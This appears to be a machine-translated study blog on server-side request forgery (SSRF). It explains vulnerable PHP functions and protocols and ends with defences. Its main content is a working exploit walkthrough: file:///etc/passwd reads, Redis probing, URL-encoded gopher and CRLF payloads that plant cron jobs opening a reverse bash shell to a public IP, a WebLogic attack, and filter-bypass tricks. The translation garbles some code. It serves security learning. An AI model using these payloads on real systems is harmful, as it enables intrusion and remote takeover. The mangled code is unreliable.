0x00 Foreword
After learned CSRF vulnerability, learned a lot. SSRF also found CSRF vulnerabilities and loopholes have a little bit similar.
CSRF CSRF, based on the client's request forgery; SSRF server-side request forgery, forgery request server-based.
Since SSRF not learn, so it is still first on the road to learning SSRF vulnerabilities it!
0x01 SSRF vulnerability Profile
1.SSRF Vulnerability Overview
SSRF (Server-Side Request Forgery: server-side request forgery) is a construct by an attacker form a security breach that initiated the request by the server.
In general, the target of the attack SSRF is not accessible from outside the network 内部系统
. (Because it is initiated by the server, so it can request the network to which it is connected and isolated from the external network. That network can take advantage of a service request, as a springboard to attack) 2.SSRF vulnerability causes the reason is often due to the formation of SSRF server provides the ability to get data from other servers and applications do not have filters and restrictions on the destination address. Such as: Get web page text content from the specified URL address load the specified address pictures, downloads and so on. It is the use of server-side request forgery. ssrf is to use server remote and local attacks.
存在缺陷的web应用作为代理
3. Local prone to the SSRF
- Transcoding service
- online translation
- Image loading and downloading (loaded through a URL address or download pictures)
- Pictures, articles collection function
- Site acquisition, local web crawl.
- Avatar place. (Remote loading picture)
- Everything must enter the URL where you can enter the ip and place.
- Looking from the URL
share
keywords:wap
,url
,link
,src
,source
,target
,u
,3g
,display
,sourceURl
,imageURL
, ,domain
...
4. Use SSRF can be achieved attack
- Can external network, server resides within the network, the local port scan, get some service banner information
- Attack the internal network or locally run applications
- Fingerprinting internal network WEB applications, to achieve (such as: readme file) by accessing the default file
- web application attacks inside and outside the network, primarily using GET parameters can be achieved attacks (such as: Struts2, sqli)
- Download internal network resources (such as: the use of
file
reading a local file protocols, etc.) - Springboard
- Ignoring cdn
- Use Redis unauthorized access, HTTP CRLF injection to achieve getshell
0x02 SSRF vulnerabilities related functions and protocols
1. Function
file_get_contents()
, fsockopen()
, curl_exec()
, fopen()
, readfile()
and other functions improper use can cause SSRF vulnerability
(1) file_get_contents ()
<?php
$url = $_GET['url'];;
echo file_get_contents($url);
?>
file_get_content
Function obtained from the user-specified url, and then specify a file name to save j, and presented to the user. file_put_content function writes a string file.
(2)fsockopen()
<?php
function GetFile($host,$port,$link) {
$fp = fsockopen($host, intval($port), $errno, $errstr, 30);
if (!$fp) {
echo "$errstr (error number $errno) \n";
} else {
$out = "GET $link HTTP/1.1\r\n";
$out .= "Host: $host\r\n";
$out .= "Connection: Close\r\n\r\n";
$out .= "\r\n";
fwrite($fp, $out);
$contents='';
while (!feof($fp)) {
$contents.= fgets($fp, 1024);
}
fclose($fp);
return $contents;
}
}
?>
fsockopen
Url achieve the specified function of acquiring the user data, the function uses the socket (port) tcp establish connection with the server data transmission. Variable host is the host name, port to port, errstr information indicating an error message will be returned string, the limit of 30
(3)curl_exec()
? <PHP
IF ( isset ( $ _POST [ 'URL' ])) {
$ Link = $ _POST [ 'URL' ];
$ curlobj = curl_init (); // Create a new resource cURL
curl_setopt ( $ curlobj , CURLOPT_POST , 0 );
curl_setopt ( $ curlobj , CURLOPT_URL to , $ Link );
curl_setopt ( $ curlobj , CURLOPT_RETURNTRANSFER , . 1 ); // set the URL and the corresponding option
$ Result =curl_exec ( $ curlobj ); // grab URL and pass it to the browser
curl_close ( $ curlobj ); // close cURL resource, and free up system resources
<span class="nv">$filename</span> <span class="o">=</span> <span class="s1">'./curled/'</span><span class="o">.</span><span class="nb">rand</span><span class="p">()</span><span class="o">.</span><span class="s1">'.txt'</span><span class="p">;</span>
<span class="nb">file_put_contents</span><span class="p">(</span><span class="nv">$filename</span><span class="p">,</span> <span class="nv">$result</span><span class="p">);</span>
<span class="k">echo</span> <span class="nv">$result</span><span class="p">;</span>
}
?>
curl_exec
Function for performing the specified session cURL
note
PHP fopen not open the wrapper 1. In general gopher
2.file_get_contents the gopher protocol is not URL-encoded
3.file_get_contents about 302 jumps Gopher will appear bug, leading to the use of failure
exist on 4.curl / libcurl 7.43 gopher protocol bug ( 00% cut-off) 7.49 has been tested and available
5.curl_exec () // default does not track jump,
6.file_get_contents () // file_get_contents support php: input // protocol
2. Protocol
(1) file
: In the case of echo of the situation, using the file protocol to read any content
(2) dict
: install the software version leaked information, see the port, within the operating redis network services, etc.
(3) gopher
: Gopher support making GET , POST request: can first get request packet capture and post a request packet, then be configured to meet the request gopher protocol. ssrf use gopher protocol is one of the most powerful protocol (commonly known as the universal protocol). It can be used to bounce shell
(4) http/s
: detecting network host survival
0x03 SSRF exploits
Local use
For example to curl, curl view a list of supported protocols curl -V
. Local Use :
(1) Protocol file using the file protocol (file read any)
curl -vvv 'file:///etc/passwd'
(2) using the protocol dict dict Protocol (configuration information acquisition Redis)
curl -vvv 'dict://127.0.0.1:6379/info'
(3) using the gopher protocol (commonly known as the universal protocol) gopher protocol (a key rebound Bash)
curl -vvv 'gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/4444 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a'
Remotely exploitable
1, environment
Attack aircraft ip: 192.168.201.129,121.36.67.230
attack aircraft: Kali, a public server
remote server ip: 39.xxx
Docker Mirror: ssrf_redis
PHP version: PHP Version 7.2.28 (5.6 version of the test will fail)
As for why I deployed on a remote server service, and receive rebound shell on a public server?
Because I think this may be a more realistic simulation of the real environment. In their favor a deeper understanding of SSRF vulnerabilities.
2, the use of the remote sample code
ssrf.php
? <PHP
$ CH = curl_init (); // create a new cURL resource
curl_setopt ( $ CH , CURLOPT_URL , $ _GET [ 'url' ]); // set URL and the appropriate option
#curl_setopt ($ ch, CURLOPT_FOLLOWLOCATION, 1 );
curl_setopt ( $ CH , CURLOPT_HEADER , 0 );
#curl_setopt ($ CH, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
curl_exec ( $ CH ); // grab URL content and pass it to the browser, stored into files
curl_close ( CH $ ); //// close cURL resource, and free up system resources
>?
post.php
<html>
<head>
<title>post</title>
</head>
<body>
<?php
echo $_REQUEST[cmd];
?>
</body>
</html>
3, remote use patterns
1. Using file
the protocol
of any document reader
curl -v 'http://39.x.x.x:8000/ssrf.php?url=file:///etc/passwd'
2. Use dict
Agreement
(1) View port version information and run on port services
curl -v 'http://39.x.x.x:8000/ssrf.php?url=dict://127.0.0.1:22/'
DESCRIPTION open port 22
(2) by dict protocol getshell
about dict protocol: request command to the server port: parameters, and at the end of the auto-fill \r\n
(CRLF).
dict protocol to be executed one by one, and the gopher protocol to execute a command on the line. One by one to perform it. 3. Use Agreement (1) within the network attack and rebound shell redis use redis redis unauthorized access attacks
gopher
攻击redis的exp
echo -e "\n\n\n*/1 * * * * bash -i >& /dev/tcp/121.36.67.230/5555 0>&1\n\n\n"|redis-cli -h $1 -p $2 -x set 1
redis-cli -h $1 -p $2 config set dir /var/spool/cron/
redis-cli -h $1 -p $2 config set dbfilename root
redis-cli -h $1 -p $2 save
redis-cli -h $1 -p $2 quit
bash shell.sh 39.x.x.x 6379
Thereby capturing the data, and converts
the conversion rule as follows:
If the first character is >
or <
then discard the row string representing the request and return time.
If the first three characters are OK + OK then discards the character string representing the returned string.
The \r
replacement string into a %0d%0a
blank line is replaced%0a
Gopher protocol attacks within the combined network redis, using top capture the conversion result data can then rebounded shell:
curl -v 'http://39.x.x.x:8000/ssrf.php?url=gopher://192.168.1.4:6379/_*1%250d%250a%248%250d%250aflushall%250d%250a%2a3%250d%250a%243%250d%250aset%250d%250a%241%250d%250a1%250d%250a%2464%250d%250a%250d%250a%250a%250a%2a%2f1%20%2a%20%2a%20%2a%20%2a%20bash%20-i%20%3E%26%20%2fdev%2ftcp%2f121.36.67.230%2f5555%200%3E%261%250a%250a%250a%250a%250a%250d%250a%250d%250a%250d%250a%2a4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2fvar%2fspool%2fcron%2f%250d%250a%2a4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a%2a1%250d%250a%244%250d%250asave%250d%250aquit%250d%250a'
Rally success
http://39.x.x.x:8000/ssrf.php
is the presence of SSRF Web services vulnerabilities
192.168.1.4
within applications where redis ip network
121.36.67.230
is a public network server, receiving rebound shell
(2) post request forgery rebound shell
curl -v 'http://39.x.x.x:8000/ssrf.php?url=gopher://192.168.1.5:80/_POST%20/post.php%20HTTP/1.1%250d%250aHost:%2039.105.93.165%250d%250aUser-Agent:%20curl/7.58.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250acmd%3Dccccc%250d%250a%250d%250abash%20-i%20%3E%26%20%2fdev%2ftcp%2f121.36.67.230%2f4444%200%3E%261'
Rally success
192.168.1.5
is a network of Web services, there are post.php
4. Use http/s
protocol
to detect internal hosts survived instructions for the network ip host survival
192.168.1.3
0x04 SSRF practical application attacks
1, gopher attack redis
Reference remotely 3. Use gopher
Agreement
2, weblogic ssrf attack redis
Download: https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf
compile and startup environment
docker-compose build
docker-compose up -d
SSRF vulnerability exists in http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp
View 1. Port
Access
/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:80
// test http://127.0.0.1:7001: 7001 will replace 80
not connect, not open port 80 described return 404, described opening port 2. The detection of the internal host survival DESCRIPTION network ip to host survival 3. HTTP header injection, using Redis rebound shell by detecting ssrf redis server in the network, found 172.22.0.2:6379 may communicate and use almost the same as the upper side of the remote. The rebound shell script written in / etc / crontab scheduled tasks
192.168.1.1
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/121.36.67.230/4444 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
Be url encoded
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F121.36.67.230%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
Newline character is "\ r \ n" replaced with "% 0D% 0A". The domain name followed by a string of url encoded on ssrf send rebound successful
0x05 SSRF related vulnerabilities to bypass
1, conventional bypass method
1.@
http: //[email protected]
is actually a user name abc connect to the site 127.0.0.1, empathy
http: //[email protected]: 8080, http: //127.0.0.1#8.8.8.8
Out of resolving the domain name @, there are differences in processing different processing functions, such as:
http://[email protected]@www.ccc.com
in the PHP parse_url
recognition will www.ccc.com, and libcur
l is identified as www.bbb.com
2. using [::]
can be utilized [::]
to about too localhost
http://[::]:80/ >>> http://127.0.0.1
3. Add the port number
http://127.0.0.1:8080
4. Use short URL
Webmaster Tools short URL
Baidu short URL
5. Use the special domain
principle is DNS resolution. xip.io can point to any domain name that
127.0.0.1.xip.io, resolves to 127.0.0.1
6. Use DNS resolution
is provided in the recording domain A, point 127.0.1
7. Use hex conversion
127.0.0.1
octal: 0177.0.0.1
Hex: 0x7f.0.0.1
Decimal: 2130706433
8. period
127。0。0。1 >>> 127.0.0.1
9.302 jump
used to generate a jump address https://tinyurl.com 302
2, common restriction
1. limited to http://www.xxx.com domain name
to bypass using http basic authentication method. That @
http://[email protected]
2. limit requests an IP address is not within the network
when the network does not permit ip address is
take a short URL to bypass (1)
(2) take special domain name
(3) take the hex conversion
3. Restrictions request only http protocol
(1) 302 jump taken
(2) take a short address
0x06 SSRF loophole defense
1, disabling unneeded protocols (eg: file:///
, gopher://
, dict://
etc.). Allow only http and https requests
2, unified error messages, prevent the error information to determine port status
3, 302 prohibit jump, or jump every time, check to see if the new network is the Host IP, until the last URL
4, set URL whitelist or restrict internal network IP
0x07 Postscript
In the learning process SSRF exploit, encountered some problems, such as bounce shell to the public network server, toss for a long time. But finally overcome the problem. At the same time, by learning SSRF vulnerability, found loopholes SSRF really smaller than the limitations of use CSRF vulnerabilities, and vulnerabilities of SSRF some applications internal network harm is relatively large. Therefore, in the development process, to try to avoid SSRF vulnerabilities.
Reference blog:
SSRF vulnerability study
SSRF - weblogic vulhub Replay and vulnerabilities within the network attack redis (a)
within ssrf attack network application
SSRF bypass Methods